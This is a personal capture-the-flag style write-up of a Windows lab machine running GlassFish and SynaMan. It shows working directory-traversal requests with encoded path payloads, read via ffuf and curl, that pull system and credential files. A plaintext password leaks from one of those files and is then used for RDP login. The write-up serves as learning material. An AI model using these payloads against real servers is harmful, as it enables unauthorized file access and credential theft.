Fish - Writeup - Konstantinovitz

## Enum - system is running windows - 4848/tcp - Glassfish - GlassFish Server Open Source Edition 4.1 - 8181/tcp - Glassfish - 6060/tcp Synametrics File Server ### 6060/tcp Synametrics File Server - Version 5.1 - No known vulnerabilities ### 8080/TCP Glassfish - Data Web - Appears to be mostly static website - Contains contact formula web form - Dir enum using [[FFUF]] reveals nothing ### 4848/TCP - Login Page ![[Pasted image 20250424111222.png]] - default glassfish creds? - vulnerable version? - copyright is very old - seems there's a directory traversal vuln ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/fish]-[192.168.188.168] ╰─> searchsploit -m 39441 Exploit: Oracle GlassFish Server 4.1 - Directory Traversal URL: https://www.exploit-db.com/exploits/39441 Path: /opt/exploitdb/exploits/multiple/webapps/39441.txt Codes: CVE-2017-1000028 Verified: True ``` >The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to a directory traversal vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server being authenticated. Directory traversal works: ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/fish]-[192.168.188.168] ╰─> ffuf -u http://$RHOST:4848/FUZZ -c -w ./dir_traversal_paths.txt -mc 200,301,302 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.1.0 ________________________________________________ :: Method : GET :: URL : http://192.168.188.168:4848/FUZZ :: Wordlist : FUZZ: ./dir_traversal_paths.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,301,302 ________________________________________________ /theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8] /theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8] /theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8] /theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8] /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8] /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8] :: Progress: [6/6] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 :: ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/fish]-[192.168.188.168] ╰─> curl http://$RHOST:4848/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 ``` Now the question becomes which files to target? - The system is not exposing any SSH ports - Perhaps some application config file? - Where's glassfish admin credentials located? - An old vulnerability in SynaMan reveals the location of a credentials file: - `C:\SynaMan\config\AppConfig.xml` We can retrieve the SynaMan config: ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/fish]-[192.168.188.168] ╰─> curl http://$RHOST:4848/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afsynaman/config/appconfig.xml <?xml version="1.0" encoding="UTF-8"?> <Configuration> <parameters> <parameter name="adminEmail" type="1" value="[email protected]"></parameter> <parameter name="smtpSecurity" type="1" value="None"></parameter> <parameter name="jvmPath" type="1" value="jre/bin/java"></parameter> <parameter name="userHomeRoot" type="1" value="C:\ProgramData\SynaManHome"></parameter> <parameter name="httpPortSSL" type="2" value="-1"></parameter> <parameter name="httpPort" type="2" value="0"></parameter> <parameter name="vmParams" type="1" value="-Xmx128m -DLoggingConfigFile=logconfig.xml"></parameter> <parameter name="synametricsUrl" type="1" value="http://synametrics.com/SynametricsWebApp/"></parameter> <parameter name="lastSelectedTab" type="1" value="1"></parameter> <parameter name="emailServerWebServicePort" type="2" value=""></parameter> <parameter name="imagePath" type="1" value="images/"></parameter> <parameter name="defaultOperation" type="1" value="frontPage"></parameter> <parameter name="publicIPForUrl" type="1" value=""></parameter> <parameter name="flags" type="2" value="2"></parameter> <parameter name="httpPort2" type="2" value="6060"></parameter> <parameter name="useUPnP" type="4" value="true"></parameter> <parameter name="smtpServer" type="1" value="mail.fish.pg"></parameter> <parameter name="smtpUser" type="1" value="arthur"></parameter> <parameter name="InitialSetupComplete" type="4" value="true"></parameter> <parameter name="disableCsrfPrevention" type="4" value="true"></parameter> <parameter name="failureOverHttpPort" type="2" value="55222"></parameter> <parameter name="smtpPort" type="2" value="25"></parameter> <parameter name="httpIP" type="1" value=""></parameter> <parameter name="emailServerWebServiceHost" type="1" value=""></parameter> <parameter name="smtpPassword" type="1" value="KingOfAtlantis"></parameter> <parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter> <parameter name="mimicHtmlFiles" type="4" value="false"></parameter> </parameters> </Configuration># ``` We get an: - SMPT password: `KingOfAtlantis` - and an admin email: `[email protected]` - dosen't work on - SynaMan login - Glassfish Admin Okay so had to look at the writeup here. Apparently I needed some other credentials: - `smptUser` = `arthur` And I needed to use those with rdesktop. Was not aware that rdesktop was running here. ## Initial Access We leverage the previously discovered credentials to access the target via [[RDP (Remote Desktop Protocol)]] ``` xfreerdp /u:arthur /p:KingOfAtlantis /v:192.168.188.168 ``` ![[Pasted image 20250424121257.png]] ## Privesc We are immediately met with a Total AV popup stating that our licence has expired. ![[fish_writeup_AV_expired.png]] https://www.exploit-db.com/exploits/47897 Well found the right privesc vector here. But the fucking publishers of this machine... The free trial expired so I can't actually execute the privesc.. This is so fucking dumb man.... ## Lessons Learned - Should have done service enumeration better, didn't initially realize that Synaman was running, had to look at the writeup for that one. Neither did I realize that rdesktop was running? - In the writeup they state Synaman 5.1 is running, but the site I hit runs SynaMan 5.1... - I don't know why Nmap didn't show me the RDP port/service? - Got more experience with [[xfreerdp]] and created associated cheatsheet